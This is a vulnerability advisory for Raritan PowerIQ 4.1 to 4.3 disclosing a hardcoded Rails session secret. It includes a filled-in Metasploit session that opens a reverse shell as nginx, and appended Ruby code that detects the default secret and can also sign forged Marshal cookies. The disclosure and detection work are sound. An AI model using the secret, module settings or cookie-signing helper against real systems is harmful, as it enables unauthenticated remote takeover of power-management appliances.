Raritan PowerIQ 4.1 / 4.2 / 4.3 Code Execution

2015.03.13
Credit: Brandon Perry
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web interface that uses a hardcoded session secret, 8e238c9702412d475a4c44b7726a0537. Because the secret is known, a session cookie signed with it is accepted as valid, and the Metasploit rails_secret_deserialization module uses it to achieve unauthenticated remote code execution as the nginx user on vulnerable systems.

msf exploit(rails_secret_deserialization) > show options

Module options (exploit/multi/http/rails_secret_deserialization):

   Name             Current Setting                   Required  Description
   ----             ---------------                   --------  -----------
   COOKIE_NAME                                        no        The name of the session cookie
   DIGEST_NAME      SHA1                              yes       The digest type used to HMAC the session cookie
   HTTP_METHOD      GET                               yes       The HTTP request method (GET, POST, PUT typically work)
   Proxies                                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RAILSVERSION     3                                 yes       The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4)
   RHOST            192.168.0.20                      yes       The target address
   RPORT            443                               yes       The target port
   SALTENC          BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw==  yes  The encrypted cookie salt
   SALTSIG          42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8  yes  The signed encrypted cookie salt
   SECRET           8e238c9702412d475a4c44b7726a0537  yes       The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie)
   TARGETURI        /login/login                      yes       The path to a vulnerable Ruby on Rails application
   VALIDATE_COOKIE  true                              no        Only send the payload if the session cookie is validated
   VHOST                                              no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(rails_secret_deserialization) > exploit

[*] Started reverse handler on 192.168.0.19:4444
[*] Checking for cookie
[*] Adjusting cookie name to _session_id
[+] SECRET matches!
[*] Sending exploit payload
[*] Sending cookie _session_id
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729) at 2015-03-11 19:45:20 -0500

id
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
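As an added defender-side check (not code from the advisory, Raritan, or the Metasploit module): given a captured _session_id cookie from a PowerIQ instance, verify whether its HMAC-SHA1 signature was produced with the hardcoded secret above, which is what the module's VALIDATE_COOKIE step confirms before it does anything else. It assumes the Rails 2 CookieStore layout (base64 Marshal data, "--", hex digest), consistent with the DIGEST_NAME SHA1 and _session_id settings in the session above; build_rails2_cookie exists only to construct a sample cookie for the check.

```ruby
require 'openssl'
require 'base64'

# Session secret the advisory reports as hardcoded in PowerIQ 4.1-4.3.
KNOWN_DEFAULT_SECRET = '8e238c9702412d475a4c44b7726a0537'.freeze

# Rails 2 CookieStore layout (assumed): "<base64 Marshal data>--<hex HMAC-SHA1>".
# Percent-decode by hand: '+' is a base64 character, so CGI.unescape would
# corrupt the data by turning it into a space.
def split_cookie(raw)
  value = raw.b.gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }
  data, sig = value.split('--', 2)
  return nil if data.nil? || data.empty? || sig.nil? || sig.empty?
  [data, sig]
end

def rails2_digest(secret, data)
  OpenSSL::HMAC.hexdigest('SHA1', secret, data)
end

# Compare digests byte by byte without an early exit.
def constant_time_eq?(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# True when the cookie's signature was produced with `secret`. A hit against
# KNOWN_DEFAULT_SECRET means the appliance still runs with the shipped secret.
def signed_with?(raw_cookie, secret)
  parts = split_cookie(raw_cookie)
  return false unless parts
  constant_time_eq?(rails2_digest(secret, parts[0]), parts[1])
end

# Recognise a Ruby Marshal 4.8 stream ("\x04\x08") in the data half without
# deserialising it; that is the format the deserialization exploit abuses.
def marshal_session?(raw_cookie)
  parts = split_cookie(raw_cookie)
  return false unless parts
  Base64.decode64(parts[0]).start_with?("\x04\x08".b)
end

# Signs a session hash the way a Rails 2 app signs its own; used here only to
# construct a sample cookie for the checks above.
def build_rails2_cookie(session_hash, secret)
  data = Base64.strict_encode64(Marshal.dump(session_hash))
  "#{data}--#{rails2_digest(secret, data)}"
end
```

A match means the installation still uses the shipped secret, so beyond applying any vendor fix the session secret has to be rotated, which invalidates every existing session.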

References:

http://www.volatileminds.net

